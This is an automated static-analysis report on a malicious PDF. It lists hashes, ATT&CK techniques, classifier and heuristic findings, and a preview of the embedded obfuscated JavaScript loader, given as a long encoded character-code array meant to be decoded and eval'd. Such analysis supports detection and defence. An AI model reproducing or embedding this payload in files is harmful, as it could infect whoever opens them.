Malicious PDF — malware analysis report

Static analysis result for SHA-256 be8b4f49ab83333d…

MALICIOUS

PDF

7.8 KB First seen: 2026-05-09
MD5: 09946ee0b85ca72ab59050a87803cb6d SHA-1: eedf404139997400e111b9d1db2bc82143dfc3f6 SHA-256: be8b4f49ab83333d107505a937a961c6457c47b93e5cfdb1ff4a4f773ebbd6c9
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier with high confidence. Embedded JavaScript was detected, which is often used to download and execute further malicious content. The JavaScript appears to be obfuscated, but the presence of a large array named 'z5BCEvT' suggests it contains encoded data or instructions. The primary attack pattern is likely the execution of this embedded script.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER
    PDF JavaScript carries a large opaque encoded stage (a large numeric character-code array feeding an auto-run script) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0069_000.js pdf-javascript-stream PDF /JS object 69 at offset 0x1BE 5717 bytes
SHA-256: 0bda2b4e2d9d23b3ca1e8b63bf6c2e39d6f32697e66ce7ca887acbbb8e34cf08
Preview script
First 1,000 lines of the extracted script
z5BCEvT=[1,87,64,83,1,120,25,110,100,81,28,3,79,71,1,1,85,9,78,84,71,89,126,66,88,79,1,82,83,72,85,72,81,13,72,64,90,88,77,68,15,77,77,8,79,83,82,86,68,68,9,85,70,81,73,72,73,11,64,79,79,81,19,29,83,82,64,68,77,28,88,8,81,83,82,88,92,64,90,88,64,83,10,26,64,67,82,81,79,70,15,88,28,85,83,83,9,82,84,77,13,72,82,81,68,79,82,17,83,88,14,19,26,92,83,26,8,83,82,68,71,79,1,66,79,81,85,84,85,72,64,84,83,90,78,79,82,73,69,81,1,64,83,72,68,9,8,66,77,1,79,85,78,69,87,77,84,68,68,1,98,17,66,1,28,125,3,4,79,18,64,81,84,4,84,68,82,25,99,9,18,18,98,23,21,21,17,4,84,4,25,4,17,25,84,17,84,4,84,21,17,25,99,22,99,16,99,17,98,17,25,4,84,4,101,4,98,20,84,25,84,4,84,22,17,17,24,96,25,21,101,100,99,22,98,4,84,4,21,4,17,21,84,25,84,4,84,25,99,20,25,18,17,23,96,25,99,100,19,4,84,4,21,4,96,101,84,20,84,4,84,18,98,100,19,21,16,100,103,19,99,20,19,4,84,4,99,4,98,20,84,21,84,4,84,25,99,100,96,100,96,25,21,25,18,20,22,4,84,4,20,4,24,20,84,17,84,4,84,20,23,22,18,20,23,25,18,25,99,17,18,4,84,4,21,4,99,22,84,18,84,4,84,18,98,20,23,22,25,22,18,103,18,18,18,4,84,4,17,4,23,103,84,17,84,4,84,25,99,21,24,19,18,21,18,98,24,18,23,4,84,4,101,4,16,103,84,18,84,4,84,20,17,99,100,96,103,17,19,17,103,17,25,4,84,4,25,4,18,22,84,103,84,4,84,16,21,98,103,18,21,17,17,98,16,100,103,4,84,4,96,4,18,100,84,21,84,4,84,17,101,18,99,103,99,22,100,20,25,21,23,4,84,4,20,4,20,25,84,20,84,4,84,103,25,17,18,100,99,23,98,19,21,25,99,4,84,4,99,4,23,21,84,17,84,4,84,98,18,16,98,25,25,101,21,20,23,17,18,4,84,4,99,4,18,25,84,17,84,4,84,17,18,20,103,25,96,20,101,98,18,17,25,4,84,4,18,4,17,22,84,25,84,4,84,20,100,20,19,98,101,18,96,20,22,100,25,4,84,4,96,4,18,20,84,25,84,4,84,99,25,103,103,98,99,103,17,96,19,103,22,4,84,4,19,4,103,25,84,98,84,4,84,103,103,96,100,18,99,99,100,103,19,22,25,4,84,4,20,4,25,23,84,19,84,4,84,21,103,23,23,23,20,23,17,96,99,25,96,4,84,4,99,4,23,23,84,99,84,4,84,24,25,24,25,96,98,23,100,100,17,23,21,4,84,4,103,4,25,19,84,23,84,4,84,20,17,22,20,23,100,23,21,23,25,25,100,4,84,4,101,4,98,99,84,20,84,4,84,22,19,17,100,23,25,103,21,21,100,20,17,4,84,4,20,4,103,24,84,17,84,4,84,100,98,98,17,20,18,20,99,18,18,17,21,4,84,4,23,4,17,20,84,25,84,4,84,20,17,98,19,20,20,25,16,25,18,20,17,4,84,4,19,4,18,20,84,18,84,4,84,22,103,18,23,98,19,19,103,99,25,17,21,4,84,4,17,4,103,20,84,103,84,4,84,16,96,18,18,22,20,20,25,20,99,103,100,4,84,4,23,4,22,24,84,99,84,4,84,103,103,17,100,20,25,20,22,25,96,100,103,4,84,4,21,4,20,99,84,20,84,4,84,103,103,100,17,17,25,103,21,98,100,22,21,4,84,4,20,4,103,23,84,17,84,4,84,23,17,22,17,20,25,19,19,22,21,23,20,4,84,4,103,4,103,22,84,23,84,4,84,18,96,23,23,19,19,23,21,23,20,23,16,4,84,4,22,4,100,23,84,22,84,4,84,23,24,19,100,23,20,23,103,23,101,23,22,4,84,4,101,4,103,23,84,19,84,4,84,23,18,19,103,23,22,23,21,18,17,22,17,4,84,4,16,4,103,19,84,23,84,4,84,23,98,22,17,23,100,22,98,23,25,22,17,4,84,4,17,4,18,18,84,23,84,4,84,18,103,23,23,22,101,23,22,23,21,26,87,4,84,4,20,125,3,100,64,84,22,67,1,8,20,103,77,78,23,83,1,81,66,74,84,17,82,28,1,9,125,3,84,66,66,64,4,66,4,79,68,84,17,68,17,8,101,66,17,84,88,83,125,3,66,70,64,26,111,1,102,114,115,98,87,64,103,91,64,71,110,82,64,114,9,125,3,84,109,123,64,81,1,4,79,68,66,17,68,28,1,17,66,66,84,17,66,4,84,17,66,17,66,17,84,17,66,4,66,17,66,17,66,4,84,17,66,4,84,17,66,4,84,17,66,17,66,17,84,17,66,4,66,17,16,20,66,4,84,21,68,4,84,23,21,4,84,21,71,21,25,21,84,22,20,4,25,21,64,21,19,4,84,23,68,4,84,21,16,4,84,22,24,21,69,23,84,21,18,4,67,20,16,22,67,4,84,20,23,4,84,21,21,4,84,23,67,20,69,21,84,20,16,4,24,21,24,22,24,4,84,22,24,4,84,20,71,4,84,23,68,23,19,23,84,22,64,4,19,23,18,23,64,4,84,21,68,4,84,21,16,4,84,20,18,23,64,21,84,23,69,4,18,21,16,21,19,4,84,20,21,4,84,22,18,4,84,22,18,20,23,20,84,21,17,4,20,21,66,21,19,4,84,20,16,4,84,23,19,4,84,22,17,20,22,20,84,20,69,125,3,22,22,86,26,23,4,84,73,72,4,8,77,79,77,68,29,28,15,67,9,85,73,78,1,77,68,22,19,1,66,74,23,25,70,18,78,78,8,1,77,78,28,77,67,74,26,66,66,67,77,67,28,67,74,10,77,78,66,74,84,70,66,74,19,22,83,82,15,17,13,67,23,72,79,12,1,18,82,85,1,82,9,25,66,79,73,68,26,76,15,77,77,85,73,78,68,77,68,83,78,8,69,68,88,28,70,76,96,26,79,68,72,28,88,1,86,78,83,83,17,9,8,29,72,9,83,64,17,89,71,26,26,76,19,17,88,122,8,17,17,76,78,72,72,1,90,1,28,83,10,10,67,77,68,124,10,66,78,66,92,84,68,1,74,69,68,1,85,77,77,15,77,26,82,73,81,83,78,72,9,75,72,79,79,66,81,69,85,121,121,125,3,116,113,81,64,86,104,83,77,70,98,117,73,71,114,91,66,69,98,110,105,84,101,102,76,125,3,67,99,79,1,111,74,91,68,86,123,13,68,72,1,101,72,79,26,85,64,15,81,9,85,84,85,125,3,9,83,8,8,114,78,77,69,112,107,85,114,78,106,106,111,89,104,121,87,77,111,75,123,71,72,108,80,120,71,74,76,70,13,76,72,1,101,106,102,113,79,68,102,64,79,125,3,9,68,86,111,111,8,8,1,85,1,76,26,85,15,79,72,88,83,69,72,90,68,82,15,77,113,64,85,73,64,88,68,86,84,66,68,83,9,68,26,79,9,85,66,77,8,92,1,92,90,73,77,8,84,85,64,1,83,101,72,77,84,88,69,81,15,70,64,72,111,9,102,114,115,98,79,85,103,91,64,71,110,101,64,114,8,8,68,109,123,85,68,13,26,86,1,84,71,9,1,79,79,66,64,92,1,126,85,72,77,9,77,79,78,76,64,66,8,64,67,64,87,72,78,77,83,1,68,90,77,79,82,73,81,68,68,77,68,82,66,66,9,28,84,84,4,64,78,69,98,17,68,125,3,25,17,18,18,17,98,4,84,4,17,4,99,22,84,18,84,4,84,23,21,21,17,21,25,25,98,25,99,25,99,4,84,4,17,4,99,96,84,16,84,4,84,17,98,17,25,22,101,17,17,20,25,25,101,4,84,4,99,4,24,18,84,21,84,4,84,100,99,22,98,25,21,20,96,21,17,20,96,4,84,4,98,4,25,21,84,23,84,4,84,25,99,100,19,18,21,100,98,101,16,21,103,4,84,4,99,4,19,100,84,100,84,4,84,19,99,20,19,25,99,100,24,20,96,17,21,4,84,4,23,4,96,20,84,25,84,4,84,25,18,20,22,20,20,22,99,20,23,18,18,4,84,4,98,4,18,22,84,25,84,4,84,25,99,17,18,18,21,20,23,22,25,17,18,4,84,4,99,4,23,19,84,22,84,4,84,103,18,18,18,25,17,21,16,103,18,18,18,4,84,4,17,4,24,96,84,21,84,4,84,98,24,18,23,20,101,99